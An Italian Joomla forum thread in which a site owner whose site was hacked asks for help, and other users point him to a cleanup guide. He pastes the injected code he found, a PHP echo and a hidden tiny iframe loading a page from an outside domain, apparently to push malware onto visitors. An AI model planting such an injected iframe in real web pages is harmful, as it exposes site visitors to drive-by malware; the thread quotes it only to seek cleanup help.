File php con stringhe e iframe sconosciuti

[mr.mikk]

Ho spulciato un po' sul forum e da quello che speravo fosse un problema banale (errori sulla cache) ho invece scoperto vari file php modificati e che inchiodano il sito lato admin e fronted. Ho copiato le stringhe che ho scoperto fino ad ora nel caso vi possano essere di aiuto e magari, per i più esperti, trovarne la fonte ed eliminarla. Vi chiedo qualche consiglio sul da farsi (ho letto cmq la bellissima guida) anche se qualche dubbio sulla fonte l'ho già. Grazie in anticipo a tutti!

Mikk

[M_W_C]

Vi chiedo qualche consiglio sul da farsi (ho letto cmq la bellissima guida)
-------------------------------------------------------
appunto, la guida è stata scritta perchè i consigli sono sempre gli stessi.

M.

[mr.mikk]

Ok sbagliato io a pensare che potessi avere un aiuto in più rispetto alla guida. Grazie lo stesso.

[M_W_C]

ma se hai bisogno di un'aiuto in più rispetto alla guida non c'è problema figurati...
la mia risposta voleva dire semplicemente che aldilà di chi fa l'attacco e del perchè le cose da fare sono sempre quelle, ma anche in generale non solo su joomla, andrebbe benissimo per drupal o wp se a volte non entrasse in path che non in tutti sono uguali.

M.

[mr.mikk]

Queste sono le stringhe incriminate (sperando siano solo queste):

Codice: [Seleziona]

$somecrainsignvar="vno0zfuf"; echo


<iframe src='http://indometastan.in/in.cgi?default' width='2' height='2' frameborder='0'></iframe>

Se può creare dei problemi il fatto che le abbia postate cancellatele pure. Da quello che ho letto su internet pare che funzioni con un iframe che installa un qualche tipo di malware (o almeno ci prova) su tutte le macchine che visitano il sito...se è così è un grosso problema. Riuscireste per caso a confermare o smentire quello che ho letto?

ps. ho trovato questo sito che pare dia una soluzione definitiva, vi pare valida?
pps. link del report di Anubis Report
Grazie a tutti

[56francesco]

la monnezza nella differenziata, non credi?
se proprio devi fai un file.txt e chi vuole se lo apre,

[mr.mikk]

Non avendo trovato il pulsante "spoiler" e avendo ipotizzato che l'upload di file fosse disattivato ho pensato fosse la soluzione più pratica e comunque non troppo ingombrante.

[56francesco]

ma a che serve? ti crediamo sulla parola,  hanno bucato il sito,  avrebbero potuto infilarci mille cose diverse..

hai dei contatori esterni per caso nel sito?

[M_W_C]

boh...non ti capisco molto... c'è scritto anche quello che dici... mi viene il dubbio che tu non parli di questo
http://forum.joomla.it/index.php/topic,117151.0.html

ti si è infettato il pc c'è scritto quello che devi fare

M.

[mr.mikk]

Contatori esterni no, avevo uno dei tanti moduli come contatore che si trovano in joomla extensions. Per adesso vi ringrazio, magari riscrivo domani quando sono più calmo perchè capisco che per voi sia difficile rimanere gentili e cortesi per così tanto tempo, in più fare tutto questo come volontariato ma visto che sono già abbastanza scocciato per questo problema rischio di flammare a ogni vostra risposta brusca e non mi sembrerebbe rispettoso nei confronti di nessuno. Comunque si la guida era quella. Grazie ancora.